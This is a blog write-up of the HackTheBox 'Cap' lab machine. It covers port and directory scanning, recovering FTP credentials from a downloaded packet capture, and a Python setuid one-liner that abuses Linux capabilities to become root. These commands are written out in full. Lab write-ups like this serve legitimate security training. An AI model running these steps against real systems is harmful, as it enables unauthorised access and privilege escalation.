Home Hackthebox cap machine Writeup
Post
Cancel

Hackthebox cap machine Writeup

Preview Image

Hello Reader!! In this writeup we are going to talk about cap hackthebox machine which is linux based box.

As usual lets start our enumeration with nmap

1
2
3
4
5
6
7
8
9
10
11
12
13
──(mrgrep㉿kali)-[~/Desktop/htb/cap]
└─$ sudo nmap 10.10.10.245                  
[sudo] password for mrgrep: 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-03 09:57 IST
Nmap scan report for 10.10.10.245
Host is up (0.79s latency).
Not shown: 997 closed ports
PORT   STATE SERVICE
21/tcp open  ftp
22/tcp open  ssh
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 4.86 seconds

As we can clearly see here 3 ports are open so I tried FTP anonymous login check but it failed :( Also, after opening ip in browser(as port 80 is open) got to know that User Nathan is logged in. Now, lets try if we can find any interesting file so let’s us dirb for that.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
┌──(mrgrep㉿kali)-[~/Desktop/htb/cap]
└─$ dirb http://10.10.10.245                                          255 ⨯ 1 ⚙

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Sat Jul  3 10:06:28 2021
URL_BASE: http://10.10.10.245/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.10.10.245/ ----
+ http://10.10.10.245/data (CODE:302|SIZE:208)                                 
+ http://10.10.10.245/ip (CODE:200|SIZE:17466)                                 
+ http://10.10.10.245/netstat (CODE:200|SIZE:28069)                            

From the above results we can clearly see that we have 3 files data, ip, and netstat. let’s check what’s in there.
After visiting /data we got nothing. So, decided to check /ip and here we go CRTP
We got the page which is showing some output for ipconfig command so let’s check netstat page too. CRTP
we can clearly see netstat command output. but nothing interesting here :(
Let’s use wfuzz with medium wordlist to check if we are missing anything.

1
2
┌──(mrgrep㉿kali)-[~/Desktop/htb/cap]
└─$ wfuzz -u http://10.10.10.245/data/FUZZ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 50 --hc 302,404

after running it I got many files so I started checking one by one then I saw a file named 00 exact path was /data/00 so I decided to visit the page. CRTP
and we can see the download button so I downloaded the file and opened it in the wireshark. After analyzing I saw lots of FTP Traffic so I Filtered traffic as FTP and here we go
CRTP
We can clearly see those credentials so I logged in to the FTP with those creds.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
──(mrgrep㉿kali)-[~/Desktop/htb/cap]
└─$ ftp 10.10.10.245                                                  127 ⨯ 2 ⚙
Connected to 10.10.10.245.
220 (vsFTPd 3.0.3)
Name (10.10.10.245:mrgrep): nathan
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-rw-r--    1 1001     1001        13831 Jul 02 23:07 46362.py
-rw-rw-r--    1 1001     1001         8696 Jul 03 03:26 dirty_sockv2.py
-rwxrwxrwx    1 1001     1001       342868 Jul 02 13:15 linpeas.sh
-rw-rw-r--    1 1001     1001       342868 Jul 02 22:58 linpeas.sh.1
-rw-rw-r--    1 1001     1001       113551 Jul 02 13:50 privesc.txt
-rwxrwxrwx    1 1001     1001            0 Jul 02 20:27 rapidscan.py
-rw-rw-r--    1 1001     1001        69009 Jul 02 20:24 rapidscan.py.1
-rwxrwxrwx    1 1001     1001          376 Jul 02 22:05 rootend
-rw-rw-r--    1 1001     1001        69550 Jul 02 22:00 rootend.py
drwxr-xr-x    3 1001     1001         4096 Jul 02 13:48 snap
-rw-rw-r--    1 1001     1001          170 Jul 02 14:02 test.service
-r--------    1 1001     1001           33 Jul 02 13:25 user.txt
-rw-rw-r--    1 1001     1001        32804 Apr 08 17:22 windapsearch.py
226 Directory send OK.

if you notice we got our user.txt flag.
Also for ssh credentials are same so after logging into ssh I ran linpeas script and got the following interested output. CRTP we can clearly see the capabilities issue and machine name also suggest the same :D
SO to confirm let’s check

1
2
nathan@cap:~$ python3 -c 'import os; os.setuid(0); os.system("whoami")'
root

and here we go….
CRTP
Thank you for reading, Have a great time ahead!!

This post is licensed under CC BY 4.0 by the author.